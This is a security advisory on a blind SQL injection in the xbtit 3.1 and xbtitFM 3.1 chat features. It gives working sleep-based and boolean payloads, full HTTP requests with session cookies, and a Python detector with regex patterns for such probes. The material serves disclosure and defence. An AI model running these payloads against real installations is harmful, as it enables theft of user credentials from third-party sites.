Blind SQL Injection affecting xbtit 3.1 and xbtitFM 3.1

SQL Injection

A blind SQL injection vulnerability exists in Xbtit 3.1 and XbtitFM 3.1 via the sid parameter (GET) of the /ajaxchat/getHistoryChatData.php file, which is reachable by a simple registered user with default privileges. As a result, a malicious user can extract sensitive data such as usernames and passwords and, in some cases, use this vulnerability to gain remote code execution.

——————————————

[Vulnerability Type]
SQL Injection

——————————————

[Vendor of Product]
Btiteam
https://github.com/btiteam/xbtit-3.1

——————————————

[Affected Product Code Base]
Xbtit 3.1
https://github.com/btiteam/xbtit-3.1/ (Latest as of 22-12-2021)
https://github.com/btiteam/xbtit-3.1/blob/master/ajaxchat/getHistoryChatData.php

XbtitFM 3.1 (Private source code thus not available to analyze further)
https[://]xbtit.eu/xbtitfm/
XbtitFM is built on xbtit’s core with additional features. It is affected by the same issue, and additionally through the extra file /chatedit.php and its vulnerable GET id parameter (msgid), which offers similar functionality.

——————————————

[Attack Type]
Remote – Authenticated

——————————————

[Impact Information Disclosure]
True

——————————————

[PoC]

Log in as a simple user and post a comment in the chat box. The sid parameter is vulnerable to an authenticated blind SQL injection. Use the following PoC, which causes a 20-second sleep delay, to manually confirm that the vulnerability exists. Note that you must be logged in as a simple user and the sid parameter must be the valid id of a chat message you have already created!


http://xbtit.local/xbtit/xbtit-3.1-master/index.php?page=allshout&sid=5537%20and%20(select*from(select(sleep(20)))a)--%20&edit

Original request (screenshot not reproduced here)

Modified request to include the SQLi payload:

GET /xbtit/xbtit-3.1-master/index.php?page=allshout&sid=5537%20and%20(select*from(select(sleep(20)))a)--%20&edit HTTP/1.1
Host: xbtit.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://xbtit.local/xbtit/xbtit-3.1-master/index.php?page=allshout
Cookie: ajax_poller_1=1; uid=6; pass=e6d36bba3f1b36152182ad0093441345; PHPSESSID=oe2bebgui5b6dhoavg59n3nnmf
Upgrade-Insecure-Requests: 1


SQLMap payloads

Boolean-based blind payload: page=allshout&sid=2201 AND 5205=5205&edit
Time-based blind payload: page=allshout&sid=2201 AND (SELECT 8933 FROM (SELECT(SLEEP(5)))gkzE)&edit

XbtitFM 3.1 (private source code) is built on xbtit’s core with additional features. It is affected by the same issue, and additionally through the extra file /chatedit.php and its vulnerable GET id parameter (msgid), which offers almost the same functionality.

So the same technique applies to /chatedit.php instead of /getHistoryChatData.php, with the msgid (GET) parameter in place of the sid (GET) parameter.


GET /chatedit.php?action=edit&msgid=16%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: xbtit.local
Cookie: uid=4; pass=f530298bfc5cd53f7316fb2f1fe34a52; PHPSESSID=f3vdo18n1t834jg6d6ok3lch36
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

Use the following PoC, which causes a 20-second sleep delay, to manually confirm that the vulnerability exists. Note that you must be logged in as a simple user and the msgid parameter must be the valid id of a chat message you have already created!


GET /chatedit.php?action=edit&msgid=16%20and%20(select*from(select(sleep(20)))a)--%20
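As an added, defender-side example (not code from the advisory or from the xbtit/xbtitFM projects), the following script checks HTTP request lines for the sid and msgid parameters used by the two PoCs above and flags any value that is not a plain decimal chat-message id, listing which blind-injection indicators (sleep() timing probe, AND (SELECT ...) subquery, n=n tautology, trailing SQL comment) it contains. The sample request lines are constructed from the requests quoted on this page plus one benign request; the assumption that a legitimate id is always a canonical non-negative integer is mine, not the page's.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Parameters that the advisory identifies as carrying a chat-message id.
ID_PARAMS = {"sid", "msgid"}

# Assumption (not from the page): a legitimate id is a canonical decimal integer,
# which is also what an integer-bound prepared statement would accept.
CANONICAL_INT = re.compile(r"^[0-9]+$")

# Indicators typical of the boolean- and time-based blind payloads quoted above.
SQLI_INDICATORS = [
    (re.compile(r"\bsleep\s*\(", re.I), "sleep() time-based probe"),
    (re.compile(r"\band\b\s*\(?\s*select\b", re.I), "AND (SELECT ...) subquery"),
    (re.compile(r"\b(\d+)\s*=\s*\1\b"), "tautology (n=n) boolean probe"),
    (re.compile(r"--\s*$|--\s"), "SQL comment terminator"),
]


def analyse_request_line(request_line: str) -> List[Dict]:
    """Return one finding per id parameter whose decoded value is not a plain integer.

    request_line is the first line of an HTTP request, e.g.
    'GET /index.php?page=allshout&sid=5537 HTTP/1.1'.
    """
    parts = request_line.split()
    if len(parts) < 2:
        return []
    query = urlsplit(parts[1]).query
    findings = []
    # parse_qs percent-decodes the values, so the payload is inspected in clear.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name not in ID_PARAMS:
            continue
        for value in values:
            if CANONICAL_INT.match(value):
                continue
            reasons = [label for pattern, label in SQLI_INDICATORS if pattern.search(value)]
            findings.append({
                "param": name,
                "value": value,
                "reasons": reasons or ["non-integer id"],
            })
    return findings


def scan(lines: List[str]) -> List[tuple]:
    """Summarise findings over many request lines as (path, param, reasons) tuples."""
    report = []
    for line in lines:
        path = line.split()[1].split("?")[0]
        for finding in analyse_request_line(line):
            report.append((path, finding["param"], finding["reasons"]))
    return report


# Constructed sample: the two PoC request lines quoted in the advisory, the
# boolean-based sqlmap payload, and one benign request to the same endpoint.
SAMPLE_REQUEST_LINES = [
    "GET /xbtit/xbtit-3.1-master/index.php?page=allshout&sid=5537 HTTP/1.1",
    "GET /xbtit/xbtit-3.1-master/index.php?page=allshout&sid=5537%20and%20(select*from(select(sleep(20)))a)--%20&edit HTTP/1.1",
    "GET /chatedit.php?action=edit&msgid=16%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1",
    "GET /xbtit/xbtit-3.1-master/index.php?page=allshout&sid=2201%20AND%205205%3D5205&edit HTTP/1.1",
]

if __name__ == "__main__":
    for path, param, reasons in scan(SAMPLE_REQUEST_LINES):
        print(f"{path} {param}: {', '.join(reasons)}")
```

The canonical-integer rule is the important part: it catches any deviation from the expected id shape, whether or not a known keyword appears, while the indicator list only labels what it found. The same rule is what the application should enforce on the server side, by casting the id to an integer and binding it as a prepared-statement parameter rather than concatenating it into the query.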


[Reference]

https://github.com/btiteam/xbtit-3.1/
